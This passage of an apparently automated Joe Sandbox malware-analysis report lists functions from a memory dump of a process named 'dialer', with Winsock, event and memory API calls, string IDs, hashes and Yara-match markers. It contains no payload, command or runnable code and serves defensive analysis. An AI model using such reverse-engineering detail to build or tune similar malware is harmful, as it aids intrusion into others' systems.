                                                                                • GetUserDefaultLangID.KERNEL32(0000005A,00000000,00000020), ref: 053C2F12
                                                                                • _snwprintf.MSVCRT ref: 053C2FB0
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 053C2FCA
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000080,00000000,00000000), ref: 053C2FF8
                                                                                • strlen.MSVCRT ref: 053C3143
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharDefaultLangMultiUserWide$_snwprintfstrlen
                                                                                • String ID: z
                                                                                • API String ID: 2883371422-1657960367
                                                                                • Opcode ID: 42027c6721f7d8482bcce898ee1ad2bf6e709370f06a0f19499edfade6a7f546
                                                                                • Instruction ID: c54cf02b9aba2835d291df154004a0bd069e01a510fa22956c112bcb518491af
                                                                                • Opcode Fuzzy Hash: 42027c6721f7d8482bcce898ee1ad2bf6e709370f06a0f19499edfade6a7f546
                                                                                • Instruction Fuzzy Hash: D5A120B5A40209AFDB20DFA4DC8AA9E7FFCFB44304F14889DF509AF380DA7499459B51
                                                                                Function 053C984B Relevance: 12.2, APIs: 8, Instructions: 170networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • shutdown.WS2_32(?,00000001), ref: 053C98C7
                                                                                • WSAGetLastError.WS2_32(?,00000000,?,053C8C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,053C8BB6,00000000,00000000,?,00000000), ref: 053C98D8
                                                                                • closesocket.WS2_32(?), ref: 053C994E
                                                                                • UnregisterWait.KERNEL32(89595908), ref: 053C9993
                                                                                • CloseHandle.KERNEL32(458BF845,00000000,00000000,?,00000000,?,053C8C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,053C8BB6,00000000), ref: 053C99AD
                                                                                • free.MSVCRT ref: 053C99D3
                                                                                • UnregisterWait.KERNEL32(?), ref: 053C99F4
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,053C8C46,00000000,00000000,00000000,00000000,00000000,00000000,00000000,053C8BB6,00000000), ref: 053C9A06
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                • String ID:
                                                                                • API String ID: 3261266694-0
                                                                                • Opcode ID: a5917f512bf804040b5313da9206d49682b423094936fcd39345492120542fc9
                                                                                • Instruction ID: 83ea83dcabecd7f855e187a3be31b701bc5180bd60e6b039ebf3ca61ec12208d
                                                                                • Opcode Fuzzy Hash: a5917f512bf804040b5313da9206d49682b423094936fcd39345492120542fc9
                                                                                • Instruction Fuzzy Hash: 5C512872604B018FDB35CF69C488B66BBE5FF08324F164A6DE8968B6A0D770F845CB50
                                                                                Function 053C2B8F Relevance: 12.1, APIs: 8, Instructions: 140stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: callocfree$memsetsrandstrlentime
                                                                                • String ID:
                                                                                • API String ID: 805530809-0
                                                                                • Opcode ID: bc8b8ce2f7f214b2b9022227065f92f1e30b810e01ef922517f7a69ba53f5c8a
                                                                                • Instruction ID: 47b55a590a80eaf2fab0b93676098b38175ef6990709a5e817af78a5c922b67a
                                                                                • Opcode Fuzzy Hash: bc8b8ce2f7f214b2b9022227065f92f1e30b810e01ef922517f7a69ba53f5c8a
                                                                                • Instruction Fuzzy Hash: F4512BB5900704AFDB20DFA5C889A9EBFF8FF08300F50896EF55A97640D775AD548B50
                                                                                Function 053CBCF1 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$memset
                                                                                • String ID:
                                                                                • API String ID: 4054172246-0
                                                                                • Opcode ID: 27c46953bfe8f2693405552f6f163032c503ebd6fff32b6ba2865aff62985c8f
                                                                                • Instruction ID: 46837969da7690f590bebbe4aec5e160ade0b7d002a256baeb6b070d661ecb08
                                                                                • Opcode Fuzzy Hash: 27c46953bfe8f2693405552f6f163032c503ebd6fff32b6ba2865aff62985c8f
                                                                                • Instruction Fuzzy Hash: 8A516772500608AFD721DF69D84AB9ABBFCFF45700F108A69E546DB180DB74EA04CBA0
                                                                                Function 053CB2A0 Relevance: 10.6, APIs: 7, Instructions: 83networksynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,053CBB80,?,000000FF,00000000,00000000), ref: 053CB2C7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,053CBB80), ref: 053CB308
                                                                                • GetLastError.KERNEL32(?,?,?,053CBB80), ref: 053CB313
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,053CBB80), ref: 053CB31C
                                                                                • WSASetLastError.WS2_32(00000000,?,?,?,053CBB80), ref: 053CB323
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,053CBB80), ref: 053CB332
                                                                                • WSASetLastError.WS2_32(00000000,?,?,?,053CBB80), ref: 053CB355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 1659421480-0
                                                                                • Opcode ID: 196948c09dc445654feeda9083d9631d19448c54ca38e952226d8cc00670c8e3
                                                                                • Instruction ID: 24e4d7d35d212797844845f00083696a4f76a1089105430531ef64124698acfa
                                                                                • Opcode Fuzzy Hash: 196948c09dc445654feeda9083d9631d19448c54ca38e952226d8cc00670c8e3
                                                                                • Instruction Fuzzy Hash: FE21F532500214ABD7325AB49C5EEAFBFADFB447B0F450358F926EB1C0DA709D4087A0
                                                                                Function 053C4F5A Relevance: 8.8, APIs: 7, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,053EDDC0,0000000C), ref: 053C4F94
                                                                                • memcmp.MSVCRT(?,053EDDB0,0000000C), ref: 053C4FB6
                                                                                • memcmp.MSVCRT(?,053EDDA0,0000000C), ref: 053C4FD8
                                                                                • memcmp.MSVCRT(?,053EDD80,0000000C), ref: 053C5018
                                                                                • memcmp.MSVCRT(?,053EDD70,0000000C), ref: 053C503A
                                                                                • memcmp.MSVCRT(?,053EDD60,0000000C), ref: 053C505C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID:
                                                                                • API String ID: 1475443563-0
                                                                                • Opcode ID: 47eb3bf2c96b548f490852703a42fc83f93343bc6dbcd317f0ac2b7f2310a698
                                                                                • Instruction ID: 1f97d5e540f0c2185c092cfbe28bddc744ecef7c4082db444dbe0a82319bbb62
                                                                                • Opcode Fuzzy Hash: 47eb3bf2c96b548f490852703a42fc83f93343bc6dbcd317f0ac2b7f2310a698
                                                                                • Instruction Fuzzy Hash: 22119DB674C73565E42121652D07F3B1ECD5B02906F4449ECEC09E89D6E681FE209397
                                                                                Function 053C34E5 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 377COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcmp$callocfree
                                                                                • String ID: factfmt RIFFdata
                                                                                • API String ID: 254810267-2461439165
                                                                                • Opcode ID: ca4751a78412b4d19d06d1163b4c2bc087ec4ddb6b34d0b6b970e31135077bc8
                                                                                • Instruction ID: 1fd189484a0d848c073dceddb90dd82ea219b7888e9454ec3fa17279f4155ec3
                                                                                • Opcode Fuzzy Hash: ca4751a78412b4d19d06d1163b4c2bc087ec4ddb6b34d0b6b970e31135077bc8
                                                                                • Instruction Fuzzy Hash: 9CD18E72E042199BDF24DFA4C884BEEBBB9BF44710F0484AEE545E7240D774EA44CB65
                                                                                Function 053D51E4 Relevance: 7.8, APIs: 6, Instructions: 347COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$calloc
                                                                                • String ID:
                                                                                • API String ID: 1504270956-0
                                                                                • Opcode ID: d25977667076de57908bb3040c836268283e1683ce5adbb34f4ed861ca865f1a
                                                                                • Instruction ID: 90dc0626b6b3aa33e3ed3dca6771c2dcc3e1b9cdd39a8267107c70080d200ebd
                                                                                • Opcode Fuzzy Hash: d25977667076de57908bb3040c836268283e1683ce5adbb34f4ed861ca865f1a
                                                                                • Instruction Fuzzy Hash: 0AC10D73A00209EBDB11DAA5E985EEFB7FEBF44240F14456AE906D7144F670EB04CBA1
                                                                                Function 053CC5F6 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strchr$memset
                                                                                • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                • API String ID: 3020236661-885041942
                                                                                • Opcode ID: e5d8b38c9f713ba45545b653990df95b04926dc60ebcf6cc6b97812826b14390
                                                                                • Instruction ID: ef3b0e07fd193ac5fbfd683db3e1f3615957a0bb973d4e72ce3549b02bc7d956
                                                                                • Opcode Fuzzy Hash: e5d8b38c9f713ba45545b653990df95b04926dc60ebcf6cc6b97812826b14390
                                                                                • Instruction Fuzzy Hash: B551803190424DDFCF21CEA8C4955EEBFB9FB41254F1450AED45AEB240D7709E85CB90
                                                                                Function 053C8E11 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,053C8E0E,00000000,053CBB73,053CBBBA,053EEEE0,053CBBC2,053CBB73,00000000), ref: 053C8E1E
                                                                                • InterlockedCompareExchange.KERNEL32(053CBB77,00000000,00000000), ref: 053C8E30
                                                                                • SetEvent.KERNEL32(00000000,?,053C8E0E,00000000,053CBB73,053CBBBA,053EEEE0,053CBBC2,053CBB73,00000000), ref: 053C8E41
                                                                                • CloseHandle.KERNEL32(00000000,?,053C8E0E,00000000,053CBB73,053CBBBA,053EEEE0,053CBBC2,053CBB73,00000000), ref: 053C8E4D
                                                                                • WaitForSingleObject.KERNEL32(053CBB73,000000FF,?,053C8E0E,00000000,053CBB73,053CBBBA,053EEEE0,053CBBC2,053CBB73,00000000), ref: 053C8E58
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4206309166-0
                                                                                • Opcode ID: 2ac053aa01820413f73c04a906d467ba65759ab1802f9c7faaafcab66ee0f245
                                                                                • Instruction ID: 813d1d645731ef3156cbdd2a43d01e1b4e2c91eeb63b2516e526279288d78fc2
                                                                                • Opcode Fuzzy Hash: 2ac053aa01820413f73c04a906d467ba65759ab1802f9c7faaafcab66ee0f245
                                                                                • Instruction Fuzzy Hash: D4F05E35114304BBDB216FA0DC4EB967FACFB08761F104415FA0A9E1C1DAB1A9408B60
                                                                                Function 053C50CC Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,053EDD30,0000000E), ref: 053C50F7
                                                                                • memcmp.MSVCRT(?,053EDD20,0000000E), ref: 053C5119
                                                                                • memcmp.MSVCRT(?,053EDD10,0000000E), ref: 053C513B
                                                                                • memcmp.MSVCRT(?,053EDD00,0000000E), ref: 053C515D
                                                                                • memcmp.MSVCRT(?,053EDCF0,0000000E), ref: 053C517F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID:
                                                                                • API String ID: 1475443563-0
                                                                                • Opcode ID: 374cdd8bbee94cebc44fd960bf5186a32b2b97fbe3a265bc4af2e440cb508a55
                                                                                • Instruction ID: 2b62e6b2e0d6d47bfc557f4996527a58ac68f4dddeb48e32e856b4ec707cc413
                                                                                • Opcode Fuzzy Hash: 374cdd8bbee94cebc44fd960bf5186a32b2b97fbe3a265bc4af2e440cb508a55
                                                                                • Instruction Fuzzy Hash: E20171B675C36935E52052652E07F361ECEAB1094AF444DDCAC09F85C1F6E2ED609742
                                                                                Function 053C5199 Relevance: 6.3, APIs: 5, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,053EDCE0,0000000F), ref: 053C51BA
                                                                                • memcmp.MSVCRT(?,053EDCD0,0000000F), ref: 053C51D8
                                                                                • memcmp.MSVCRT(?,053EDCC0,0000000F), ref: 053C51FA
                                                                                • memcmp.MSVCRT(?,053EDCB0,0000000F), ref: 053C521C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID:
                                                                                • API String ID: 1475443563-0
                                                                                • Opcode ID: 04a2dd88ef19a29e8a54c356bf31a4c8bd952e82d979bdab62385b687ff1a57e
                                                                                • Instruction ID: 4dc41feafcd044b683d51e3d8a7c30202f71d7f5ae9f531b2cae3572b94e3a39
                                                                                • Opcode Fuzzy Hash: 04a2dd88ef19a29e8a54c356bf31a4c8bd952e82d979bdab62385b687ff1a57e
                                                                                • Instruction Fuzzy Hash: 340178B278873225D52151651D07F3A2ECD6B01986F4048EDEC09E89CAF2C1EE216787
                                                                                Function 053CE0E5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: callocfree
                                                                                • String ID: P
                                                                                • API String ID: 306872129-3110715001
                                                                                • Opcode ID: ddbe9c6c6f570563048057cedfb526c2b238d1e1c12ea09f0e78050a39d4873e
                                                                                • Instruction ID: d842fcd6edaf97e5b24ddbca5db13a43d2a13fab03dc3a187ca8ef45ebffe77b
                                                                                • Opcode Fuzzy Hash: ddbe9c6c6f570563048057cedfb526c2b238d1e1c12ea09f0e78050a39d4873e
                                                                                • Instruction Fuzzy Hash: 9251B2337096009FD776AA28C889F697F9ABF41700F1884ECF4478B692EA61EC449755
                                                                                Function 053C39C1 Relevance: 6.1, APIs: 4, Instructions: 89networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                • String ID:
                                                                                • API String ID: 928751204-0
                                                                                • Opcode ID: 3e381ee13b6722ffc37edd36b173326237a2009c6d1c545fedf30de0fa301d1c
                                                                                • Instruction ID: 6ffa219a4b9ae9dbf04f8d4c58c90aaf77fb6d72f6f339e9e2ce90adff985987
                                                                                • Opcode Fuzzy Hash: 3e381ee13b6722ffc37edd36b173326237a2009c6d1c545fedf30de0fa301d1c
                                                                                • Instruction Fuzzy Hash: 1F317E76A00205EFCB24DF94C848FAABBFAFF44314F158899E4059B251E371EE55CB91
                                                                                Function 053CA53B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 053CA641
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 053CA6F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastRecv
                                                                                • String ID: E'
                                                                                • API String ID: 904507345-3751625834
                                                                                • Opcode ID: a0afcf1e8237655e99681bce9dcaa75c9a35a61b68294e5d1dc90b4a3738b9ed
                                                                                • Instruction ID: 889864e11c88c0d91f86a3b6321774d3ac2df3a9ecd0233d972426704f5428c0
                                                                                • Opcode Fuzzy Hash: a0afcf1e8237655e99681bce9dcaa75c9a35a61b68294e5d1dc90b4a3738b9ed
                                                                                • Instruction Fuzzy Hash: 7781027150470CAFDB318F54C884EAA7FFAFF04364F00869DE99686690E771EE958B90